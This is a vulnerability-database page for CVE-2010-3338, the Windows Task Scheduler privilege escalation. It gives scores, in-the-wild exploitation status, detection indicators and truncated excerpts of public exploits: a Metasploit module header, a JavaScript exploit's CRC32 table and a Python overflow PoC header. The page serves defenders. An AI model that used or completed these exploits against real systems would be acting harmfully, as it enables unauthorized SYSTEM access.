CVE-2010-3338
published 2010-12-16CVE-2010-3338: The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the…
PriorityP272high7.2CVSS 2.0
AVLACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
19.86%
97.1th percentile
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for task XML files written to %SystemRoot%\system32\tasks\ by non-SYSTEM processes, especially with modified UserId set to S-1-5-18 (SYSTEM SID) or Author set to 'LocalSystem'. ↗
- →Detect task XML manipulation replacing 'LeastPrivilege' with 'HighestAvailable' and SID values with S-1-5-18 in task files under system32\tasks\. ↗
- →Alert on rapid schtasks.exe sequence: /create followed by /change /disable, /change /enable, and /run against the same task name — this disable/enable cycle is the exploit trigger. ↗
- →Detect task XML files with a BOM of 0xFFFE (UTF-16 LE) written directly to the tasks folder by user-level processes, as the exploit rewrites the task file with a forged CRC32 and Unicode BOM. ↗
- →Flag creation of a batch file (xpl.bat) in %TEMP% that adds a local user and adds them to the administrators group, dropped as the payload by the VBScript exploit variant. ↗
- →Detect use of Metasploit module ms10_092_schelevator via meterpreter session writing a random-named .exe to %TEMP% and registering it as a scheduled task. ↗
- →Monitor for 'Actions Context' attribute changed from 'Author' to 'LocalSystem' and 'Principal id' changed from 'Author' to 'LocalSystem' in task XML files. ↗
- ·The exploit only works against Windows Vista, Windows 7, and Windows Server 2008 (including R2); other Windows versions are not affected. ↗
- ·The Metasploit module does not support WOW64 (32-bit meterpreter on 64-bit OS) due to filesystem redirection preventing direct task file access; an x64 meterpreter session is required. ↗
- ·The vulnerability requires the attacker to have a local session (local privilege escalation only); remote exploitation is not possible. ↗
- ·The exploit relies on the Task Scheduler using only a CRC32 checksum for integrity validation, meaning the forged task file must produce a CRC32 collision with the original to succeed. ↗
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mpmp-qx9g-mvg3: The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine th
ghsa_unreviewed·2022-05-14·CVSS 7.2
CVE-2010-3338 [HIGH] CWE-20 GHSA-mpmp-qx9g-mvg3: The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine th
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888.
VulnCheck
Microsoft Windows Improper Input Validation
vulncheck·2010·CVSS 7.2
CVE-2010-3338 [HIGH] Microsoft Windows Improper Input Validation
Microsoft Windows Improper Input Validation
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf; https://go.group-ib.com/hubfs/report/protected/group-ib-opera1er-full-threat-research-2022-en.pdf
Exploit PoC: http
No detection rules found.
Exploit-DB
Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
exploitdb·2012-07-19
CVE-2010-3888 Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'rex'
require 'zlib'
class Metasploit3 'Windows Escalate Task Scheduler XML Privilege Escalation',
'Description' => %q{
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32
checksum to validate that the file has not been tampered with. Also, In a default
configuration, normal users can read and write the tas
Exploit-DB
Microsoft Windows - Task Scheduler Privilege Escalation
exploitdb·2010-11-20
CVE-2010-3888 Microsoft Windows - Task Scheduler Privilege Escalation
Microsoft Windows - Task Scheduler Privilege Escalation
---
# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D5
Exploit-DB
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
exploitdb·2010-08-14·CVSS 10.0
CVE-2007-3336 [CRITICAL] CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Metasploit
Windows Escalate Task Scheduler XML Privilege Escalation
metasploit
Windows Escalate Task Scheduler XML Privilege Escalation
Windows Escalate Task Scheduler XML Privilege Escalation
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.
http://www.securitytracker.com/id?1024874http://www.us-cert.gov/cas/techalerts/TA10-348A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-092https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12304http://www.securitytracker.com/id?1024874http://www.us-cert.gov/cas/techalerts/TA10-348A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-092https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12304
2010-12-16
Published
Exploited in the wild